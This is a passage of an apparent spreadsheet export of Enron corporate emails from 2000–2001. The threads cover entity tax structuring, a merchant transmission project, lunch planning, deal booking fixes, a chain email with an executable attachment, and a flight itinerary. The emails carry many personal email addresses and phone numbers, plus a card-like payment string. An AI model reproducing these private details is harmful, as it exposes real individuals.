robert.bruce@enron.com_x000D_
----- Forwarded by Robert Bruce/NA/Enron on 02/06/2001 09:20 AM -----_x000D_
_x000D_
	Janine Juggins@ECT_x000D_
	02/02/2001 08:17 AM_x000D_
		_x000D_
		 To: Janine Juggins/LON/ECT@ECT_x000D_
		 cc: Trena McFarland/NA/Enron@Enron, Sheila Glover/HOU/ECT@ECT, Robert _x000D_
Bruce/NA/Enron@Enron, Morris Richard Clark/HOU/ECT@ECT, Catharina _x000D_
Clabots/LON/ECT@ECT, Stephen H Douglas/HOU/ECT@ECT_x000D_
		 Subject: Re: Softs structure_x000D_
_x000D_
Attached is the legal structure chart referred to in the mail below._x000D_
_x000D_
_x000D_
_x000D_
Also, further to Trena's mail yesterday if because there is a requirement to _x000D_
use a single legal entity as principal only alternatives A and B will be _x000D_
considered, the recommendation would be to use Enron Softs Inc and not ENA. _x000D_
This is because of the additional tax exposure which would potentially attach _x000D_
to the income generated by other businesses in ENA._x000D_
_x000D_
A decision not to use a separate legal entity in the UK (alternative C ) _x000D_
attracts a tax disbenefit. _x000D_
_x000D_
I will estimate the tax costs/benefits of the alternatives A thru C so that _x000D_
they can be factored into the overall cost/benefit analysis. Do you have an _x000D_
estimate of the net income before tax which will be earned by the Softs _x000D_
business, split between NY activity and London activity ? Maybe this can be _x000D_
taken from the budgets for 2001 ?_x000D_
_x000D_
Regards_x000D_
Janine_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Janine Juggins_x000D_
01/02/2001 17:49_x000D_
To: Trena McFarland/NA/Enron@Enron, Sheila Glover/HOU/ECT@ECT, Robert _x000D_
Bruce/NA/Enron@Enron_x000D_
cc: Morris Richard Clark/HOU/ECT@ECT, Catharina Clabots/LON/ECT@ECT _x000D_
_x000D_
Subject: Softs structure_x000D_
_x000D_
Attached is a (very) draft note discussing the various alternative structures _x000D_
addressed during various telephone calls. It is far from finalised, but I _x000D_
thought it would be a good idea to circulate it now to get some further _x000D_
feedback. Note that Morris and Catharina have not yet had the opportunity to _x000D_
review and comment on the draft. I will follow up with a corporate structure _x000D_
chart tomorrow so that it is clear where all the entities sit within our _x000D_
corporate structure._x000D_
_x000D_
My view is that it is preferable to use EFET LLC for the London based _x000D_
activity and ENA for the NY based activity. _x000D_
_x000D_
I have not referred at all to ECTRIC because this entity will be effectively _x000D_
replaced over time by EFET LLC._x000D_
_x000D_
Regards_x000D_
Janine_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 6 Jun 2001 08:56:38 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Neptune -- merchant transmission</t>
  </si>
  <si>
    <t xml:space="preserve">thanks Vince.   I read about this in MW Daily and on Bloomberg.   I think it will be a good project._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Kaminski, Vince J  _x000D_
Sent:	Wednesday, June 06, 2001 9:46 AM_x000D_
To:	Presto, Kevin M._x000D_
Subject:	FW: Neptune -- merchant transmission_x000D_
_x000D_
Kevin,_x000D_
_x000D_
Please, take a look at the link to the website_x000D_
describing the Neptune project (a merchant transmission_x000D_
DC line from Canada and Maine to  NE). The link is embedded in one of the messages below._x000D_
_x000D_
The Neptune Regional Electrical Transmission System will connect rapidly growing, electric-load centers in New York City, downtown Boston, and the Connecticut and New Jersey shores with clean and efficient electric generating facilities in Eastern Canada and Maine._x000D_
_x000D_
Employing state of the art, environmentally proven sub-sea cable technology, the Neptune System will overcome constraints to the existing land-based electric transmission grid which hinder the efficient use of energy resources along the Mid and North Atlantic seaboard. _x000D_
_x000D_
_x000D_
Any interest?_x000D_
_x000D_
Vince_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Cunningham, Lance  _x000D_
Sent:	Wednesday, June 06, 2001 8:36 AM_x000D_
To:	Kaminski, Vince J_x000D_
Subject:	RE: Neptune -- merchant transmission_x000D_
_x000D_
Vince,_x000D_
_x000D_
Interestingly enough I have just spoken with Walter Coffer about an undersea project that Enron may be undertaking to take power from Canada to the New England area.  I'd like to talk with you about this when you have an opportunity._x000D_
_x000D_
Lance  _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Kaminski, Vince J  _x000D_
Sent:	Wednesday, June 06, 2001 8:22 AM_x000D_
To:	Cunningham, Lance_x000D_
Subject:	FW: Neptune -- merchant transmission_x000D_
_x000D_
_x000D_
Lance,_x000D_
_x000D_
Who would be the right person on the trading desk to take a look at it?_x000D_
_x000D_
Vince_x000D_
 -----Original Message-----_x000D_
From: 	"Edward Krapels" &lt;ekrapels@esaibos.com&gt;@ENRON [mailto:IMCEANOTES-+22Edward+20Krapels+22+20+3Cekrapels+40esaibos+2Ecom+3E+40ENRON@ENRON.com] _x000D_
Sent:	Wednesday, June 06, 2001 5:24 AM_x000D_
To:	Kaminski, Vince J_x000D_
Subject:	RE: Neptune -- merchant transmission_x000D_
_x000D_
Thanks Vince... We'll be auctioning off transmission rights in these_x000D_
corridors in September (assuming FERC approves our filing), which confronts_x000D_
traders with a complex array of valuation problems (the long-term value of_x000D_
the right to ship energy along these DC pathways and to collect ancillary_x000D_
services in each of the markets). It's a conceptually difficult challenge_x000D_
for most companies but I'm sure Enron is all over it. We'll be interested in_x000D_
whether or not Enron's traders participate in this auction._x000D_
_x000D_
We are also pre-selling some of the capacity in negotiations over the_x000D_
summer, in the expectation of FERC approval of that concept (kind of an_x000D_
anchor tenant concept)._x000D_
_x000D_
As you will recall, we did approach Enron early on in the project (a fellow_x000D_
in Calgary whose name I cannot remember) and he indicated no interest. I'll_x000D_
keep you in the loop because I suspect you'll find the intellectual_x000D_
challenge intriguing -- what is access to DC capacity worth? --- as I do._x000D_
_x000D_
Hope things are going well in all of your markets!_x000D_
_x000D_
Ed_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Kaminski, Vince J [mailto:Vince.J.Kaminski@ENRON.com]_x000D_
Sent: Monday, June 04, 2001 12:31 PM_x000D_
To: ekrapels@esaibos.com_x000D_
Subject: RE: Neptune -- merchant transmission_x000D_
_x000D_
_x000D_
Hello Ed,_x000D_
_x000D_
It sounds very interesting. I forwarded your messages_x000D_
to two members of my group who work on the problems related_x000D_
to transmission (a key to the power markets successful_x000D_
growth)._x000D_
_x000D_
I shall share with you their  reaction._x000D_
_x000D_
I hope everything is going well._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
&gt;  -----Original Message-----_x000D_
&gt; From: 	"Edward Krapels" &lt;ekrapels@esaibos.com&gt;@ENRON_x000D_
&gt; [mailto:IMCEANOTES-+22Edward+20Krapels+22+20+3Cekrapels+40esaibos+2Eco_x000D_
&gt; m+3E+40ENRON@ENRON.com]_x000D_
&gt; Sent:	Friday, June 01, 2001 5:12 AM_x000D_
&gt; To:	Vincent Kaminski \(E-mail\)_x000D_
&gt; Subject:	Neptune -- merchant transmission_x000D_
&gt;_x000D_
&gt; Dear Vince,_x000D_
&gt;_x000D_
&gt; Greetings from Boston... In the last year, I've been associated with_x000D_
&gt; the_x000D_
&gt; Neptune merchant transmission project... check it out at_x000D_
&gt; www.NeptuneRTS.com._x000D_
&gt; We filed with FERC last week and I'm sending you the Wall Street_x000D_
&gt; Journal and_x000D_
&gt; Megawatt Daily articles on it._x000D_
&gt;_x000D_
&gt; Have you seen any good analytical work on merchant transmission? I'm_x000D_
&gt; in a_x000D_
&gt; dialogue with Paul Joskow and others on this issue but as always would_x000D_
&gt; appreciate your thoughts._x000D_
&gt;_x000D_
&gt; All the best,_x000D_
&gt;_x000D_
&gt; Ed_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; Edward N. Krapels, PhD_x000D_
&gt; Director_x000D_
&gt; ESAI Power and Gas Services_x000D_
&gt; tel 781 245 2036_x000D_
&gt; cell 617 899 4948_x000D_
&gt; ekrapels@esaibos.com_x000D_
&gt; www.esai.com_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;  - winmail.dat &lt;&lt; File: winmail.dat &gt;&gt;_x000D_
_x000D_
 - winmail.dat &lt;&lt; File: winmail.dat &gt;&gt; </t>
  </si>
  <si>
    <t>Thu, 7 Dec 2000 07:59:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'rmendoza@mail.mdanderson.org'})</t>
  </si>
  <si>
    <t>Re: FW: Sledding</t>
  </si>
  <si>
    <t xml:space="preserve">Don't you have work to do??_x000D_
: )_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
rmendoza@mail.mdanderson.org on 12/07/2000 03:51:22 PM_x000D_
To: aballesteros@vaughnconstruction.com, ckraham@enron.com, _x000D_
sscott3@enron.com, craig.hiddleston@enron.com, LKTiemann@dkapl.com, _x000D_
DMMoreau@dkapl.com, SZSmith@dkapl.com, KDBelinowski@dkapl.com, _x000D_
mmcain_1998@yahoo.com, smiling417@aol.com, GIGDEM@aol.com, _x000D_
PLopiccolo@aol.com, mhowell@mdanderson.org, radracr5@hotmail.com, _x000D_
aowintx@hotmail.com, jkane@mdanderson.org, trjackson@mdanderson.org, _x000D_
cmgregg@mdanderson.org, fthomas@mdanderson.org, nortega@mdanderson.org, _x000D_
mdgarcia@mdanderson.org, MFlores@mdanderson.org, fygr@dynegy.com, _x000D_
craig@sportsperformancecenter.com, MOM2522@aol.com, Tiny105@aol.com, _x000D_
MWitsken@aol.com, Kardo1225@aol.com, PJFTennis@aol.com, shanestone@hotmail.com_x000D_
cc:  _x000D_
_x000D_
Subject: FW: Sledding_x000D_
_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Rosanna A. Mendoza/MDACC on 12/07/2000 _x000D_
03:42_x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
"CALVIN SUDDEATH" &lt;CALVIN.SUDDEATH@prodigy.net&gt; on 12/07/2000 03:28:25 PM_x000D_
_x000D_
To:   "Victoria Gardner" &lt;gardnervictoria@hotmail.com&gt;, "Tim Volpone"_x000D_
      &lt;tceanr@knownet.net&gt;, "Tim Carlson" &lt;tctmc@hal-pc.org&gt;, "Thomas C_x000D_
      Mitchell" &lt;tcmitch@acninc.net&gt;, "Susan/Brad Leonard" _x000D_
&lt;bleonard@ncweb.com&gt;,_x000D_
      "Susan Prins" &lt;prins.susan.r000@sysco.com&gt;, "Stephen Schneider"_x000D_
      &lt;srvtx@hotmail.com&gt;, "Stephen Schneider" &lt;stschneider@na.cokecce.com&gt;,_x000D_
      "Scott Pokorny" &lt;Roofman920@aol.com&gt;, "Sandy Rodabaugh"_x000D_
      &lt;srodabaugh@suite224.net&gt;, "Rosanna A Mendoza"_x000D_
      &lt;rmendoza@mail.mdanderson.org&gt;, "Rodney Ashley" &lt;HotRod02@flash.net&gt;,_x000D_
      "Robin Miggo-Wells" &lt;Hobowells@Yahoo.com&gt;, "Robert W Dale"_x000D_
      &lt;Robertwdale@aol.com&gt;, "Ralph H Sanchez" &lt;ralph.sanchez@compaq.com&gt;,_x000D_
      "Phillip Lathan" &lt;plathan@columbus.rr.com&gt;, "Paula Ruple-Blum"_x000D_
      &lt;vablum@msn.com&gt;, "Naomi R Rodriguez" &lt;end.nat@prodigy.net&gt;, "Missy_x000D_
      Starling" &lt;missy.starling@ceridian.com&gt;, "Mary M. O'Connor"_x000D_
      &lt;moconnor@giveblood.org&gt;, "Martin Vaughan Faubion" _x000D_
&lt;Martin@Pacchart.com&gt;,_x000D_
      "Larry Haines" &lt;lhaines@mwweb.com&gt;, "Kelina Seppi"_x000D_
      &lt;Kellukalla@hotmail.com&gt;, "Keith Whitman" &lt;WhitmanK@unk.edu&gt;, "Karen_x000D_
      Warren-Shank" &lt;Shanekel@aol.com&gt;, "Jennifer Brito"_x000D_
      &lt;JSBrito@earthlink.net&gt;, "Janis Newman" &lt;janis1@swbell.net&gt;, "Erica L_x000D_
      Smallwood-Elliott" &lt;elliott4@suite224.net&gt;, "Duane K Durham"_x000D_
      &lt;dkdbull@aol.com&gt;, "Christine Miller" &lt;christine@zmailmedia.com&gt;, _x000D_
"Carolyn_x000D_
      J Austin-Campbell" &lt;SCamp32561@aol.com&gt;, "Carl Bruce"_x000D_
      &lt;Cbruce@houston.rr.com&gt;, "Bridget Porter" _x000D_
&lt;Porter.Bridget.r000@sysco.com&gt;,_x000D_
      "Brian Marshall" &lt;brian.marshall@ca.com&gt;, "Brandie Rhodes"_x000D_
      &lt;brhodes@aeros.com&gt;, "Bobbie Darbonne"_x000D_
      &lt;bdarbonne@pegasus-international.com&gt;, "Beth  Wright"_x000D_
      &lt;Bethann115@hotmail.com&gt;, "Andrew Christie" &lt;achristie@cynetinc.com&gt;, _x000D_
"Amy_x000D_
      Coons" &lt;amy26@gateway.net&gt;_x000D_
cc:    (bcc: Rosanna A. Mendoza/MDACC)_x000D_
Subject:  FW: Sledding_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Kandy K Kaleh [mailto:kkkaleh@riley-harris.com]_x000D_
Sent: Thursday, December 07, 2000 2:54 PM_x000D_
To: 'Calvin Suddeath'; 'Purrecious'; 'Sandy Wagner'; 'Sheryl'; 'Steve';_x000D_
'Steve Schneider'; 'Spencer Dunn'; 'Sheryl'_x000D_
Subject: FW: Sledding_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Renea Ziemba [mailto:rziemba@springtime-santa.com]_x000D_
Sent: Wednesday, December 06, 2000 10:29 AM_x000D_
To: Vicki; Trace; Terry; Stevie; Maureen; Mary; Lisa; Kelly; Kathy_x000D_
Wozny; Judy Stern; John &amp; Katie; Franzee; Domenica; Chrys; Cari_x000D_
Subject: Fw: Sledding_x000D_
_x000D_
_x000D_
_x000D_
----- Original Message -----_x000D_
From: "Sue Gutkowski" &lt;SGUTKOWSKI@J-QUIN.com&gt;_x000D_
To: "Bill (E-mail)" &lt;Bill_Grimpe@HomeDepot.COM&gt;; "Brian Wozny (E-mail)"_x000D_
&lt;CHICAGO_ANIMAL@YAHOO.COM&gt;; "cai (E-mail)" &lt;Grandmacai@webtv.net&gt;; "Carol_x000D_
Brown (E-mail)" &lt;kctrip@nitline.net&gt;; "Dawn (E-mail)" &lt;galmal@yahoo.com&gt;;_x000D_
"Edith Amesquita (E-mail)" &lt;ESAmesquita@johncrane.com&gt;; "Judy (E-mail)"_x000D_
&lt;JetCityWoman@mindspring.com&gt;; "Karen (E-mail)" &lt;karen@pipeline.com&gt;; "Renea_x000D_
(E-mail)" &lt;rziemba@springtime-santa.com&gt;; "Rob (E-mail)"_x000D_
&lt;rgutkow106@aol.com&gt;; "Ron (E-mail)" &lt;RON6503@aol.com&gt;; "Sally (E-mail)"_x000D_
&lt;sallyb@unitedinsulated.com&gt;_x000D_
Sent: Wednesday, December 06, 2000 9:46 AM_x000D_
Subject: FW: Sledding_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; &gt; &lt;&lt;downhill.exe&gt;&gt;_x000D_
&gt;_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 - downhill.exe_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 29 Nov 2000 06:52:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'frazier.king@enron.com'})</t>
  </si>
  <si>
    <t>RE: 24th IAEE International Conference</t>
  </si>
  <si>
    <t xml:space="preserve">I'm dialling in from home -- got the bug that's going around the office.  _x000D_
I'll call you in a few..._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Frazier King_x000D_
11/29/2000 02:44 PM_x000D_
To: Susan Scott/ET&amp;S/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: RE: 24th IAEE International Conference  _x000D_
_x000D_
_x000D_
Are you back at work??_x000D_
Heard you were sick._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Susan Scott_x000D_
11/29/2000 02:41 PM_x000D_
To: "Caldwell, Charles" &lt;ccaldwell@velaw.com&gt;_x000D_
cc: "'dttran@duke-energy.com'" &lt;dttran@duke-energy.com&gt;, _x000D_
Susan.Scott@enron.com, "Frazier. King@enron. com (E-mail)" _x000D_
&lt;Frazier.King@enron.com&gt; _x000D_
_x000D_
Subject: RE: 24th IAEE International Conference  _x000D_
_x000D_
Frazier tells me he's available.  How about 11:45 at Little Pappasito's on _x000D_
Kirby @ Richmond?_x000D_
_x000D_
_x000D_
_x000D_
"Caldwell, Charles" &lt;ccaldwell@velaw.com&gt; on 11/29/2000 08:39:59 AM_x000D_
To: "'dttran@duke-energy.com'" &lt;dttran@duke-energy.com&gt;, Susan.Scott@enron.com_x000D_
cc: "Frazier. King@enron. com (E-mail)" &lt;Frazier.King@enron.com&gt; _x000D_
_x000D_
Subject: RE: 24th IAEE International Conference_x000D_
_x000D_
_x000D_
Date, time, and either of those places are fine with me, subject to_x000D_
Frazier's availability.  This would be a good opportunity to discuss topics_x000D_
for the luncheons, which Frazier and I have been trying to do for a while._x000D_
I also need to share with you some conversations I've been having with folks_x000D_
at EBA in DC and proposals they are pushing at the Houston chapter._x000D_
_x000D_
-----Original Message-----_x000D_
From: dttran@duke-energy.com [mailto:dttran@duke-energy.com]_x000D_
Sent: Tuesday, November 28, 2000 2:55 PM_x000D_
To: Susan.Scott@enron.com_x000D_
Cc: Caldwell, Charles_x000D_
Subject: RE: 24th IAEE International Conference_x000D_
_x000D_
_x000D_
_x000D_
Oooh, "venue." I like it.  The 24th is good with me.  How about either_x000D_
Pappadeaux or Pappasito or anything else around the Kirby/59 area?  Should_x000D_
take you guys the same amount of time getting out of downtown.   11:30? (to_x000D_
beat the lunch crowd)._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
                    Susan.Scott@e_x000D_
_x000D_
                    nron.com             To:     "Caldwell, Charles"_x000D_
&lt;ccaldwell@velaw.com&gt;_x000D_
                                         cc:     "'dttran@duke-energy.com'"_x000D_
_x000D_
                    11/28/2000           &lt;dttran@duke-energy.com&gt;_x000D_
_x000D_
                    02:40 PM             Subject:     RE: 24th IAEE_x000D_
International_x000D_
                                         Conference_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
I am free for lunch on 12/4.  I'll see if Frazier's available._x000D_
Why don't we choose a venue somewhere between Duke and downtown._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Caldwell, Charles" &lt;ccaldwell@velaw.com&gt; on 11/28/2000 02:12:47 PM_x000D_
_x000D_
To:   "'dttran@duke-energy.com'" &lt;dttran@duke-energy.com&gt;,_x000D_
      Susan.Scott@enron.com_x000D_
cc:_x000D_
_x000D_
Subject:  RE: 24th IAEE International Conference_x000D_
_x000D_
_x000D_
Sounds like an excellent idea.  Does lunch on Monday, December 4th work for_x000D_
your schedules?  If not, let's hear a counter-offer._x000D_
_x000D_
-----Original Message-----_x000D_
From: dttran@duke-energy.com [mailto:dttran@duke-energy.com]_x000D_
Sent: Tuesday, November 28, 2000 1:39 PM_x000D_
To: Susan.Scott@enron.com_x000D_
Cc: ccaldwell@velaw.com_x000D_
Subject: Re: 24th IAEE International Conference_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Susan,_x000D_
_x000D_
I go this email as well.  Unfortunately, I've been busy as well and didn't_x000D_
really look at it.  As for future matters, what will be our involvement for_x000D_
EBA-Houston events?  Would the two of you like to get together for lunch_x000D_
sometime, maybe with Frazier and the other current EBA officers so we can_x000D_
understand our roles/duties/functions a little better (hey, aren't we both_x000D_
pretty big clients of a certain Houston law firm? -- hint, hint, Charles  :_x000D_
)_x000D_
_x000D_
- Dat_x000D_
713-260-7105_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
                    Susan.Scott@e_x000D_
_x000D_
                    nron.com             To:     ccaldwell@velaw.com,_x000D_
_x000D_
                                         dttran@duke-energy.com_x000D_
_x000D_
                    11/21/2000           cc:_x000D_
_x000D_
                    01:13 PM             Subject:     24th IAEE_x000D_
International Conference_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Does anyone know this person or his organization?  Is this something our_x000D_
membership might be interested in?  Frankly I have been too busy to think_x000D_
about this -- if you have any comments let's talk._x000D_
_x000D_
Susan Scott_x000D_
713-853-0596_x000D_
---------------------- Forwarded by Susan Scott/ET&amp;S/Enron on 11/21/2000_x000D_
01:08 PM ---------------------------_x000D_
_x000D_
_x000D_
Gurcan Gulen &lt;ggulen@UH.EDU&gt; on 11/21/2000 10:24:13 AM_x000D_
_x000D_
To:   ccaldwell@velaw.com, dttran@duke-energy.com, susan.scott@enron.com_x000D_
cc:_x000D_
_x000D_
Subject:  24th IAEE International Conference_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
About three weeks ago, I inquired about EBA's  interest in organizing a_x000D_
concurrent session at the upcoming IAEE (International  Association for_x000D_
Energy Economics) conference in Houston (April  2001)._x000D_
_x000D_
Since I did not hear back from you, I assume that  EBA was not interested._x000D_
It would help us a lot in our future planning  if you could perhaps help me_x000D_
with your reasoning.  Did we approach you  too late (given the Dec 4_x000D_
deadline)?   We required all participants to pay registration fees, was_x000D_
that an issue?   We couldn't guarantee you a slot even if you proposed a_x000D_
session, was that an  issue?_x000D_
_x000D_
Thanks in advance for your response._x000D_
_x000D_
_x000D_
S. Gurcan Gulen, Ph.D._x000D_
Research  Associate_x000D_
Energy Institute_x000D_
Bauer College of Business_x000D_
University of  Houston_x000D_
Houston, TX 77204-6283_x000D_
713-743-4696 (p)_x000D_
713-743-4881 (f)_x000D_
www.uh.edu/energyinstitute_x000D_
_x000D_
_x000D_
_x000D_
_x000D_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_x000D_
_x000D_
_x000D_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_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 6 Nov 2000 00:00:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: EES Basis Report</t>
  </si>
  <si>
    <t>Thanks.  How was the rest of your weekend?_x000D_
_x000D_
RR</t>
  </si>
  <si>
    <t>Fri, 20 Apr 2001 13:12:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Errol, thanks for writing.  I discussed this matter with George Huan this morning, in person, and he tells me that he rebooked the deals originally booked to El Paso Merchant Energy Gas - L.P. to El Paso Merchant Energy L.P. correctly in his spreadsheet pretty late last night after you spoke with him and so it did not get into our system last night.  He has assured me, however, that everything is in order for tonight's run and that the problem should be fixed Monday.  I will advise you if the situation is unresolved Monday.  Thanks for your follow up.  Sue._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	McLaughlin, Errol  _x000D_
Sent:	Thursday, April 19, 2001 9:05 PM_x000D_
To:	Vasan, Sue_x000D_
Subject:	El Paso Status in the Exotic Files_x000D_
_x000D_
Sue,_x000D_
_x000D_
I am sending you this e-mail because I received your voice message well after you left it today.  I reviewed the text files that are sent out by the book administrators on my desks and none of them contain any deals booked to the counterparty El Paso Gas Marketing.  All of the deals from people on my desk are booked to the valid El Paso counterparty per our conversations._x000D_
_x000D_
I will be out of the office tomorrow, but I will be checking my voicemail frequently and communicating with my group.  If the same problem arises tomorrow, please call me at 713-305-1502 so that we can discuss, because there has to be some other explanation for the erroneous counterparty showing up on your report._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Errol McLaughlin, X5-8274</t>
  </si>
  <si>
    <t>Tue, 24 Apr 2001 11:31:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lisa.shoemake@enron.com'})</t>
  </si>
  <si>
    <t>08MAY HOUSTON TO ST LOUIS = DON BAUGHMAN = TICKETED</t>
  </si>
  <si>
    <t xml:space="preserve">Here are the travel arrangements you asked for._x000D_
_x000D_
Thanks_x000D_
Lisa x39194_x000D_
---------------------- Forwarded by Lisa Shoemake/HOU/ECT on 04/24/2001 08:29 AM ---------------------------_x000D_
_x000D_
_x000D_
sandra delgado &lt;sdelgado_vitoltvl@yahoo.com&gt; on 04/23/2001 01:23:01 PM_x000D_
To:	LISA.SHOEMAKE@ENRON.COM_x000D_
cc:	 _x000D_
Subject:	08MAY HOUSTON TO ST LOUIS = DON BAUGHMAN = TICKETED_x000D_
_x000D_
_x000D_
                                          AGENT JS/SS BOOKING REF_x000D_
ZYPFJE_x000D_
_x000D_
                                          BAUGHMAN/DON_x000D_
_x000D_
_x000D_
  ENRON_x000D_
  1400 SMITH_x000D_
  HOUSTON TX 77002_x000D_
  ATTN-LISA SHOEMAKE X39194_x000D_
_x000D_
_x000D_
  DATE:  APR 23 2001                   ENRON_x000D_
_x000D_
SERVICE               DATE  FROM           TO             DEPART_x000D_
ARRIVE_x000D_
_x000D_
CONTINENTAL AIRLINES  08MAY HOUSTON TX     ST LOUIS MO    115P    319P_x000D_
CO 1062    Q          TUE   G.BUSH INTERCO LAMBERT_x000D_
                            TERMINAL C     TERMINAL M_x000D_
                                                          NON STOP_x000D_
                            RESERVATION CONFIRMED         2:04 DURATION_x000D_
                  AIRCRAFT: BOEING 737-500_x000D_
                            SEAT 15D NO SMOKING CONFIRMED BAUGHMAN/DON_x000D_
_x000D_
CONTINENTAL AIRLINES  09MAY ST LOUIS MO    HOUSTON TX     645P    900P_x000D_
CO 3739    Q          WED   LAMBERT        G.BUSH INTERCO_x000D_
                            TERMINAL M     TERMINAL B_x000D_
                                                          NON STOP_x000D_
                            RESERVATION CONFIRMED         2:15 DURATION_x000D_
                            FLIGHT OPERATED BY CONTINENTAL EXPRESS_x000D_
                  AIRCRAFT: EMBRAER EMB 145_x000D_
                            SEAT 09B NO SMOKING CONFIRMED BAUGHMAN/DON_x000D_
_x000D_
      AIR FARE 206.51       TAX 23.99           TOTAL USD_x000D_
230.50_x000D_
_x000D_
                                        INVOICE TOTAL USD_x000D_
230.50_x000D_
_x000D_
PAYMENT: CCAX378501848782000/0303/A000021_x000D_
_x000D_
RESERVATION NUMBER(S)  CO/N61WW1_x000D_
_x000D_
BAUGHMAN/DON                             TICKET:CO/ETKT 005 7027685498_x000D_
_x000D_
NON-REFUNDABLE TKT MINIMUM $100.00 CHANGE FEE_x000D_
***********************************************_x000D_
HIS IS A TICKETLESS RESERVATION. PLEASE HAVE A_x000D_
PICTURE ID AVAILABLE AT THE AIRPORT. THANK YOU_x000D_
                  THANK YOU FOR CALLING VITOL TRAVEL_x000D_
_x000D_
_x000D_
___________________________________________________x000D_
Do You Yahoo!?_x000D_
Yahoo! Auctions - buy the things you want at great prices_x000D_
http://auctions.yahoo.com/_x000D_
</t>
  </si>
  <si>
    <t>Fri, 6 Apr 2001 09:01:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'focuscapital@email.msn.com'})</t>
  </si>
  <si>
    <t>Re: resume</t>
  </si>
  <si>
    <t xml:space="preserve">Scott,_x000D_
_x000D_
Thanks. My HR people should we get in touch with you._x000D_
We gave them the names of candidates we are interested in and_x000D_
they will send the others to the IT group for consideration._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Focuscapital" &lt;focuscapital@email.msn.com&gt; on 04/06/2001 12:05:41 PM_x000D_
To: &lt;vkamins@enron.com&gt;_x000D_
cc:  _x000D_
Subject: resume_x000D_
_x000D_
_x000D_
_x000D_
This guy lives in Houston._x000D_
?_x000D_
Thanks, Scott_x000D_
Focus Capital Markets_x000D_
71 Vanderbilt Avenue_x000D_
Suite 200_x000D_
New York, NY  10017_x000D_
(212) 986-3344 Tele_x000D_
(212) 986-3370 Fax_x000D_
 - FOCUS JAY DAVE.Doc_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 16 Oct 2000 06:22:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'liz.bellamy@enron.com', 'stacey.neuweiler@enron.com'})</t>
  </si>
  <si>
    <t>Meter 0074</t>
  </si>
  <si>
    <t xml:space="preserve">Has this been resolved?_x000D_
_x000D_
D_x000D_
---------------------- Forwarded by Daren J Farmer/HOU/ECT on 10/16/2000 _x000D_
01:20 PM ---------------------------_x000D_
Aimee Lannou   10/10/2000 05:34 PM_x000D_
_x000D_
To: Liz Bellamy/NA/Enron@Enron, Stacey Neuweiler/HOU/ECT@ECT_x000D_
cc: Daren J Farmer/HOU/ECT@ECT, Fred Boas/HOU/ECT@ECT _x000D_
Subject: Meter 0074_x000D_
_x000D_
Liz or Stacey - There is flow at meter 74 on 9/14 (499 dth).  The deal for _x000D_
this meter (400289) did not start until 9/15.  Could one of you extend the _x000D_
deal for this?  I would be greatly appreciated._x000D_
_x000D_
Aimee_x000D_
</t>
  </si>
  <si>
    <t>Tue, 18 Jan 2000 11:08:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'sylvia.campos@enron.com', 'brenda.fletcher@enron.com'})</t>
  </si>
  <si>
    <t>CGAS Pals agreements</t>
  </si>
  <si>
    <t>Please set up the following CGAS contracts.  Please note; ENA is agent for CES_x000D_
_x000D_
Pipeline CGAS_x000D_
Contract 64031_x000D_
Firmness IT_x000D_
Service Type Storage Service_x000D_
Rate  ISS_x000D_
Term Type Term_x000D_
Eff Date  1/1/2000 - 1/31/2000  Evergreen_x000D_
_x000D_
Pipeline CGAS_x000D_
Contract 64041_x000D_
Firmness IT_x000D_
Service Type Storage Service_x000D_
Rate  ISS_x000D_
Term Type Term_x000D_
Eff Date  1/1/2000 - 1/31/2000  Evergreen</t>
  </si>
  <si>
    <t>Fri, 9 Mar 2001 00:46:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'dstewart@tnrcc.state.tx.us'})</t>
  </si>
  <si>
    <t>Re: Spraberry Carbuerator Installation</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Larry,_x000D_
_x000D_
Finally got the documentation you sent in.  Jim Linville and I reviewed it.  _x000D_
